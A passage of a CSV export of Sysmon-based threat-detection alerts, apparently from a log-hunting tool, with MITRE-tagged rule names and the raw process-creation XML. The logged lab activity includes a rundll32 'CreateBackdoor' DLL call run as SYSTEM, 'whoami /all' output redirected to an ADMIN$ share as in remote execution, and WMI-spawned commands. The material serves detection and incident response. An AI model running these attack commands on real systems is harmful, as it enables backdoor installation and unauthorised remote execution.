<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\whoami.exe&quot; /all</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Documents\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-5B3A-5CC7-0000-002096080100</Data>
<Data Name=""LogonId"">0x10896</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274</Data>
<Data Name=""ParentProcessGuid"">365ABB72-65A9-5CC7-0000-00104E5C2400</Data>
<Data Name=""ParentProcessId"">3376</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -s -NoLogo -NoProfile</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T0000 ] Suspicious process name detected,1556571562.144046,2019-04-30T00:59:22.144046+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( &quot;C:\Windows\system32\whoami.exe&quot; /all ) contain suspicious command ( whoami.exe),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-29T20:59:22.144046Z"">
</TimeCreated>
<EventRecordID>8050</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1896"" ThreadID=""1820"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-29 20:59:22.128</Data>
<Data Name=""ProcessGuid"">365ABB72-65AA-5CC7-0000-00104D882400</Data>
<Data Name=""ProcessId"">2116</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\whoami.exe&quot; /all</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Documents\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-5B3A-5CC7-0000-002096080100</Data>
<Data Name=""LogonId"">0x10896</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274</Data>
<Data Name=""ParentProcessGuid"">365ABB72-65A9-5CC7-0000-00104E5C2400</Data>
<Data Name=""ParentProcessId"">3376</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -s -NoLogo -NoProfile</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
Command run remotely Using WMI,1603490254.745175,2020-10-24T01:57:34.745175+04:00,,Threat,Critical,User (NT AUTHORITY\NETWORK SERVICE) run command through WMI with process (C:\Windows\System32\wbem\WmiPrvSE.exe) and commandline ( C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-23T21:57:29.217562Z"">
</TimeCreated>
<EventRecordID>423991</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3208"" ThreadID=""4804"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-23 21:57:29.192</Data>
<Data Name=""ProcessGuid"">747F3D96-51C9-5F93-0000-001010175B00</Data>
<Data Name=""ProcessId"">8796</Data>
<Data Name=""Image"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">WMI Provider Host</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Wmiprvse.exe</Data>
<Data Name=""CommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\NETWORK SERVICE</Data>
<Data Name=""LogonGuid"">747F3D96-C50A-5F93-0000-0020E4030000</Data>
<Data Name=""LogonId"">0x3e4</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=67C25C8F28B5FA7F5BAA85BF1D2726AED48E9CF0,MD5=06C66FF5CCDC2D22344A3EB761A4D38A,SHA256=B5C78BEF3883E3099F7EF844DA1446DB29107E5C0223B97F29E7FAFAB5527F15,IMPHASH=CFECEDC01015A4FD1BAACAC9E592D88B</Data>
<Data Name=""ParentProcessGuid"">00000000-0000-0000-0000-000000000000</Data>
<Data Name=""ParentProcessId"">836</Data>
<Data Name=""ParentImage"">?</Data>
<Data Name=""ParentCommandLine"">?</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766825.569133,2020-03-21T09:00:25.569133+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.548464Z"">
</TimeCreated>
<EventRecordID>243565</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.544</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-0010729F2000</Data>
<Data Name=""ProcessId"">3536</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.569133,2020-03-21T09:00:25.569133+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.548464Z"">
</TimeCreated>
<EventRecordID>243565</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.544</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-0010729F2000</Data>
<Data Name=""ProcessId"">3536</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1597237560.737148,2020-08-12T17:06:00.737148+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c reg query &quot;HKLM\Software\WOW6432Node\Npcap&quot; /ve 2&gt;nul | find &quot;REG_SZ&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-08-12T13:05:38.260138Z"">
</TimeCreated>
<EventRecordID>342409</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3344"" ThreadID=""4176"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-08-12 13:05:38.149</Data>
<Data Name=""ProcessGuid"">747F3D96-E922-5F33-0000-00107A2B0B00</Data>
<Data Name=""ProcessId"">6952</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">C:\Windows\system32\cmd.exe /c reg query &quot;HKLM\Software\WOW6432Node\Npcap&quot; /ve 2&gt;nul | find &quot;REG_SZ&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-E909-5F33-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-E90A-5F33-0000-0010863C0100</Data>
<Data Name=""ParentProcessId"">1740</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\SYSTEM32\cmd.exe /c &quot;&quot;C:\Program Files\Npcap\CheckStatus.bat&quot;&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564825609.436856,2019-08-03T13:46:49.436856+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot;\system32\cleanmgr.exe /autoclean /d C: ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-03T09:46:49.402550Z"">
</TimeCreated>
<EventRecordID>5134</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2780"" ThreadID=""3676"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-03 09:46:49.331</Data>
<Data Name=""ProcessGuid"">747F3D96-5809-5D45-0000-00100B233F00</Data>
<Data Name=""ProcessId"">1380</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot;\system32\cleanmgr.exe /autoclean /d C:</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-56A3-5D45-0000-0020B3D31800</Data>
<Data Name=""LogonId"">0x18d3b3</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D4EA-5D45-0000-00105CD60000</Data>
<Data Name=""ParentProcessId"">1072</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766825.569133,2020-03-21T09:00:25.569133+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.548464Z"">
</TimeCreated>
<EventRecordID>243565</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.544</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-0010729F2000</Data>
<Data Name=""ProcessId"">3536</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami /all ) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-30T20:35:13.543589Z"">
</TimeCreated>
<EventRecordID>9840</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1964"" ThreadID=""1664"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-30 20:35:13.527</Data>
<Data Name=""ProcessGuid"">365ABB72-B181-5CC8-0000-00108DC71E00</Data>
<Data Name=""ProcessId"">692</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">whoami /all </Data>
<Data Name=""CurrentDirectory"">C:\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-B17F-5CC8-0000-0020C6A31E00</Data>
<Data Name=""LogonId"">0x1ea3c6</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274</Data>
<Data Name=""ParentProcessGuid"">365ABB72-B181-5CC8-0000-001023C41E00</Data>
<Data Name=""ParentProcessId"">1256</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /Q /c whoami /all 1&gt; \\127.0.0.1\ADMIN$\__1556656511.61 2&gt;&amp;1</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
Command run remotely Using WMI,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,User (NT AUTHORITY\NETWORK SERVICE) run command through WMI with process (C:\Windows\System32\wbem\WmiPrvSE.exe) and commandline ( C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-20T22:35:26.755693Z"">
</TimeCreated>
<EventRecordID>422746</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3408"" ThreadID=""4448"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-20 22:35:26.747</Data>
<Data Name=""ProcessGuid"">747F3D96-662E-5F8F-0000-001023353800</Data>
<Data Name=""ProcessId"">6748</Data>
<Data Name=""Image"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">WMI Provider Host</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Wmiprvse.exe</Data>
<Data Name=""CommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\NETWORK SERVICE</Data>
<Data Name=""LogonGuid"">747F3D96-E130-5F8F-0000-0020E4030000</Data>
<Data Name=""LogonId"">0x3e4</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=67C25C8F28B5FA7F5BAA85BF1D2726AED48E9CF0,MD5=06C66FF5CCDC2D22344A3EB761A4D38A,SHA256=B5C78BEF3883E3099F7EF844DA1446DB29107E5C0223B97F29E7FAFAB5527F15,IMPHASH=CFECEDC01015A4FD1BAACAC9E592D88B</Data>
<Data Name=""ParentProcessGuid"">00000000-0000-0000-0000-000000000000</Data>
<Data Name=""ParentProcessId"">840</Data>
<Data Name=""ParentImage"">?</Data>
<Data Name=""ParentCommandLine"">?</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1597237545.570757,2020-08-12T17:05:45.570757+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-08-12T13:05:36.555348Z"">
</TimeCreated>
<EventRecordID>342408</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3344"" ThreadID=""4176"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-08-12 13:05:36.545</Data>
<Data Name=""ProcessGuid"">747F3D96-E920-5F33-0000-001043920A00</Data>
<Data Name=""ProcessId"">5128</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-E911-5F33-0000-0020241C0400</Data>
<Data Name=""LogonId"">0x41c24</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-E914-5F33-0000-001009990500</Data>
<Data Name=""ParentProcessId"">5144</Data>
<Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
